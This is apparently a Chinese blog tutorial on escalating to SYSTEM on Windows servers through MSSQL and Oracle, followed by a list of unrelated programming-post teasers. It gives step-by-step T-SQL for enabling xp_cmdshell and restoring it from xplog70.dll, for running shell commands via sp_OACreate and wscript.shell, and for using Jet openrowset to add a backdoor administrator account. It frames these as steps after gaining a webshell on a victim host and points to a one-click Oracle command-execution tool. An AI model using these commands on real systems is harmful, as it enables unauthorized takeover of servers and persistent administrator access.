当前位置：首页 > news >正文

Windows提权：利用MSSQL数据库，Oracle数据库

news 2025/7/8 7:08:29

MSSQL提权：使用xp_cmdshell进行提权

MSSQL：使用sp_OACreate进行提权

MSSQL：使用沙盒提权

Oracle提权：工具一把梭哈

总结

MSSQL在Windows server类的操作系统上，默认具有system权限。

MSSQL提权：使用xp_cmdshell进行提权

限制条件：得到数据库sa权限账户得账户密码

原理：

xp_cmdshell是sql server中的一个组件，xp_cmdshell可以让系统管理员以操作系统命令行解释器的方式执行给定的命令字符串，并以文本行方式返回任何输出。
xp_cmdshell能提权的原理是sql server支持堆叠查询方式，而xp_cmdshell可以执行cmd的指令

利用手法

通过配置文件获取账号密码，哥斯拉登录数据库，SQL SERVER默认支持外链

这一步其实是在对方主机上连接得数据库，因为webshell位于对方主机上。

Navicat连接数据库执行

没错，MSSQL的利用就是这么简单

但是该组件默认是关闭的，因此需要把它打开。

开启xp_cmdshell

exec sp_configure 'show advanced options', 1;reconfigure;
exec sp_configure 'xp_cmdshell',1;reconfigure;

关闭xp_cmdshell

exec sp_configure 'show advanced options', 1;reconfigure;
exec sp_configure 'xp_cmdshell', 0;reconfigure;

xp_cmdshell被注销了，解决办法：

可以先上传xplog70.dll进行恢复

exec master.sys.sp_addextendedproc 'xp_cmdshell','C:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll'

总结：

xp_cmdshell默认在mssql2000中是开启的，在mssql2005之后的版本中则默认禁止。如果用户拥有管理员sa权限则可以用sp_configure重新开启它。

启用：
EXEC sp_configure 'show advanced options', 1
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

关闭：
exec sp_configure 'show advanced options', 1;
reconfigure;
exec sp_configure 'xp_cmdshell', 0;
reconfigure;

执行：
EXEC master.dbo.xp_cmdshell '命令'

如果xp_cmdshell被删除了，可以上传xplog70.dll进行恢复
exec master.sys.sp_addextendedproc 'xp_cmdshell', 'C:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll'

MSSQL：使用sp_OACreate进行提权

在xp_cmdshell被删除或者出错情况下，可以充分利用SP_OACreate进行提权

原理：

sp_oacreate 是一个非常危险的存储过程可以删除、复制、移动文件。主要用来调用OLE对象，利用OLE对象的方法执行系统命令。

利用手法：

开启组件：

EXEC sp_configure 'show advanced options', 1;  
RECONFIGURE WITH OVERRIDE;  
EXEC sp_configure 'Ole Automation Procedures', 1;  
RECONFIGURE WITH OVERRIDE;

补充：关闭组件

EXEC sp_configure 'show advanced options', 1;  
RECONFIGURE WITH OVERRIDE;  
EXEC sp_configure 'Ole Automation Procedures', 0;  
RECONFIGURE WITH OVERRIDE;

执行命令后写入1.txt进行验证

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c whoami >c:\\1.txt'

写入成功！！！

后续可以直接命令执行反弹shell

总结

启用：
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure 'Ole Automation Procedures', 1;
RECONFIGURE WITH OVERRIDE;

关闭：
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure 'Ole Automation Procedures', 0;
RECONFIGURE WITH OVERRIDE;

执行：
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c whoami >c:\\1.txt'

以上是使用sp_oacreate的提权语句，主要是用来调用OLE对象（Object Linking and Embedding的缩写，VB中的OLE对象），利用OLE对象的run方法执行系统命令。

MSSQL：使用沙盒提权

什么是沙盒？

沙盒（英语：sandbox，又译为沙箱），计算机专业术语，在计算机安全领域中是一种安全机制，为运行中的程序提供的隔离环境。通常是作为一些来源不可信、具破坏力或无法判定程序意图的程序提供实验之用。

利用手法：

执行添加管理员的命令

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:/windows/system32/ias/ias.mdb','select shell("net user margin margin /add")')

那么输入以下命令，启用Ad Hoc Distributed Queries：

exec sp_configure 'Ad Hoc Distributed Queries',1;
reconfigure;

exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines', 'SandBoxMode'

执行添加一个管理员 margin 命令

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:/windows/system32/ias/ias.mdb','select shell("net user margin margin /add")')

net user 查看，发现margin用户成功添加

将margin用户提升到超级管理员权限

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:/windows/system32/ias/ias.mdb','select shell("net localgroup administrators margin /add")')

net localgroup administrators 查看超级管理员组账户有margin

总结：

--提权语句exec sp_configure 'show advanced options',1;reconfigure;-- 不开启的话在执行xp_regwrite会提示让我们开启，exec sp_configure 'Ad Hoc Distributed Queries',1;reconfigure;--关闭沙盒模式，如果一次执行全部代码有问题，先执行上面两句代码。exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;--查询是否正常关闭，经过测试发现沙盒模式无论是开，还是关，都不会影响我们执行下面的语句。exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines', 'SandBoxMode'--执行系统命令select * from openrowset('microsoft.jet.oledb.4.0',';database=c:/windows/system32/ias/ias.mdb','select shell("net user margin margin /add")')select * from openrowset('microsoft.jet.oledb.4.0',';database=c:/windows/system32/ias/ias.mdb','select shell("net localgroup administrators margin /add")')沙盒模式SandBoxMode参数含义（默认是2）`0`：在任何所有者中禁止启用安全模式`1` ：为仅在允许范围内`2` ：必须在access模式下`3`：完全开启openrowset是可以通过OLE DB访问SQL Server数据库，OLE DB是应用程序链接到SQL Server的的驱动程序。--恢复配置--exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1;--exec sp_configure 'Ad Hoc Distributed Queries',0;reconfigure;--exec sp_configure 'show advanced options',0;reconfigure;

Oracle提权：工具一把梭哈

oracle数据库的管理员是dba

工具项目地址：GitHub - jas502n/oracleShell: oracle 数据库命令执行

1、普通用户模式：

前提是拥有一个普通的oracle连接账号，不需要DBA权限，可提权至DBA，并以oracle实例运行的权限执行操作系统命令。

2、DBA用户模式：

拥有DBA账号密码，可以省去自己手动创建存储过程的繁琐步骤，一键执行测试。

3、注入提升模式：

拥有一个oracle注入点，可以通过注入点直接执行系统命令，此种模式没有实现回显

总结

MSSQL数据库提权总结归纳：

MSSQL数据库三种提权方式都是死的：固定得命令执行

三种提权方式都是通过web权限查看配置文件的方式获取到MSSQL数据库的账号密码，再进行提权的，MSSQL数据库是默认允许外链的，我们获得sa账户密码后，可以直接远程登录数据库。再数据库的SQL语句执行环境进行提权的。

Oracle数据库的利用就很简单，工具梭哈即可。

Windows提权：利用MSSQL数据库，Oracle数据库

目录 MSSQL提权：使用xp_cmdshell进行提权 MSSQL：使用sp_OACreate进行提权 MSSQL：使用沙盒提权 Oracle提权：工具一把梭哈总结 MSSQL在Windows server类的操作系统上，默认具有system权限。 MSSQL提权：使…...

编程日记 2023/5/31 2:47:48

linux常见的二十多个指令

目录一、指令的概念二、28个常见的指令 ⭐2.1 ls指令 ⭐2.2 pwd指令 ⭐2.3 cd指令 ⭐2.4tree指令 ⭐2.5 mkdir指令 ⭐2.6 touch指令 ⭐2.7 rmdir指令 ⭐2.8 rm指令 ⭐2.9 clear指令 ⭐2.10 man指令 ⭐2.11 cp指令 ⭐2.12 mv指令 ⭐2.13 cat指令（适…...

编程日记 2023/5/31 2:42:42

内蒙古自治区住房和城乡建设分析及解决方案

安科瑞徐浩竣江苏安科瑞电器制造有限公司 zx acrelxhj 摘要：为深入贯彻落实《国务院办公厅关于印发新能源汽车产业发展规划（2021—2035年）的通知》（国办发 ﹝2020﹞39号）、《国家发展改革委等部门关于进一步提升…...

编程日记 2023/5/31 2:37:41

JavaEE进阶5/25（属性注入）

目录 1.更简单的存取Spring对象 2.获取Bean对象（对象装配）DI 3. Resource注入 4.Resource注入和Autowired注入的区别 1.更简单的存取Spring对象 2.获取Bean对象（对象装配）DI 对象装配（对象注入）有三种方…...

编程日记 2023/5/31 2:32:40

【Java学习记录-4】相关名词和概念记录（持续更新）

目录 1 注解2 包3 权限修饰符4 状态修饰符1. final2. static 5. 多态6.抽象类7.接口 1 注解 Override是一个注解，可以帮助我们检查重写方法的方法声明的正确性注意： 私有方法不能被重写（父类私有成员子类是不能继承的）子类方法…...

编程日记 2023/5/31 2:27:39

《程序员面试金典（第6版）》面试题 16.25. LRU 缓存（自定义双向链表，list库函数，哈希映射）

题目描述设计和构建一个“最近最少使用”缓存，该缓存会删除最近最少使用的项目。缓存应该从键映射到值(允许你插入和检索特定键对应的值)，并在初始化时指定最大容量。当缓存被填满时，它应该删除最近最少使用的项目。题目传送门：…...

编程日记 2023/5/31 2:22:38

kong网关启用jwt认证插件

认证流程： 1、创建一个用户 2、生成jwt的所需要的key和密钥 3、在https://jwt.io/的生成jwt token 4、启用jwt插件 5、发送请求的时候携带jwt的token信息官方指导：https://docs.konghq.com/hub/kong-inc/jwt/configuration/examples/ 一、创建一个新的…...

编程日记 2023/5/31 2:17:38

day12 - 图像修复

在图像处理的过程中，经常会遇到图像存在多余的线条或者噪声的情况，对于这种情况我们会先对图像进行预处理，去除掉对图形内容有影响的噪声，在进行后续的处理。本节实验我们介绍使用图像膨胀来处理图形的多余线条，进行…...

编程日记 2023/5/31 2:12:37

1720_Linux学习中的问题处理

全部学习汇总：GreyZhang/little_bits_of_linux: My notes on the trip of learning linux. (github.com) 这个有点学习的方法论的意思，画个滋味导图顺便整理一下。遇到问题的时候，解决的方法大致有3中，而针对学习的建议有一部分是…...

编程日记 2023/5/31 2:07:36

七人拼团系统开发模式详解

七人拼团是最近兴起的一个模式，它通过更人性化的奖励机制，将产品利润最大化让利给参与拼团的用户，达到促进用户主动积极裂变和团队平台引流提升销量的效果，下面就来详细说一下这个模式。七人拼团最大的特点，就是结合了…...

编程日记 2023/5/31 2:02:35

CPU性能优化：分支预测

条件跳转引起的控制冒险虽然也可以通过在流水线中插入空泡来避免，但是当流水线很深时，需要插入更多的空泡。一个20级的流水线为例，如果一条指令需要上一条指令的执行结束才能执行，则需要在这两条指令之间插入19个空泡，…...

编程日记 2023/5/31 1:57:34

过滤器Filter 快速入门详情登录校验-Filter package com.itheima.filter;import com.alibaba.fastjson.JSONObject; import com.itheima.pojo.Result; import com.itheima.utils.JwtUtils; import lombok.extern.slf4j.Slf4j; import org.springframework.util.StringUtils…...

编程日记 2023/5/31 1:52:32

kafka整理

kafka整理一、kafka概述 kafka是apache旗下一款开源的顶级的消息队列的系统, 最早是来源于领英, 后期将其贡献给apache, 采用语言是scala.基于zookeeper, 启动kafka集群需要先启动zookeeper集群, 同时在zookeeper记录kafka相关的元数据 kafka本质上就是消息队列的中间件产品…...

编程日记 2023/5/31 1:47:32

为什么有些情况下需要重写equals()和hashCode()方法？

目录方法作用实战案例方法作用 equals()：判断对象是否相等，比如判断是否能放入Set集合中情况1：没有重写equals()方法：由于所有类的默认基类都是Object类，所以默认使用Object类的equals()方法，那就是对象…...

编程日记 2023/5/31 1:42:31

14-Vue技术栈之Vue3快速上手

目录 1.Vue3简介2. Vue3带来了什么2.1 性能的提升2.2 源码的升级2.3 拥抱TypeScript2.4 新的特性 1、海贼王，我当定了！——路飞 2、人，最重要的是“心”啊！——山治 3、如果放弃，我将终身遗憾。——路飞 4、人的梦想是…...

编程日记 2023/5/31 1:37:30

JavaScript高级三、深入面向对象

零、文章目录 JavaScript高级三、深入面向对象 1、编程思想 （1）面向过程介绍面向过程：分析出解决问题所需要的步骤，然后用函数把这些步骤一步一步实现，使用的时候再一个一个的依次调用就可以了。 （2&…...

编程日记 2023/5/31 1:32:29

static

1. 静态局部变量 ： 用于函数体的内部修饰变量，这种变量的生存期长于该函数。 2. 静态全局变量： 定义在函数体外，用于修饰全局变量，表示该变量只在本文件可见。 3. 静态函数： 准确的说，静态函数跟…...

编程日记 2023/5/31 1:27:28

zabbix动作执行失败 No media defined for user.

问题 zabbix动作执行失败 No media defined for user. 详细问题解决方案 1（导航栏）用户 → \rightarrow →报警媒介 → \rightarrow →添加 2 选择类型 → \rightarrow →收件人 → \rightarrow →添加 3 更新解决原因笔者由于未点击更新钮导…...

编程日记 2023/5/31 1:22:27

JavaScript this 关键字

在JavaScript中，this关键字是一个特殊的关键字，它在函数内部使用，用于引用当前执行上下文中的对象。 this的值是在函数调用时动态确定的，它取决于函数的调用方式。下面列举了几种常见的调用方式和this的取值： 1. 全局…...

编程日记 2023/5/31 1:17:26

ubuntu基本信息查询

查询CPU信息 cat /proc/cpuinfo cat /proc/stat top lscpu 查询内存 free -m Options: -b, --bytes show output in bytes -k, --kilo show output in kilobytes -m, --mega show output in megabytes -g, --giga show output in gigab…...

编程日记 2023/5/31 1:12:25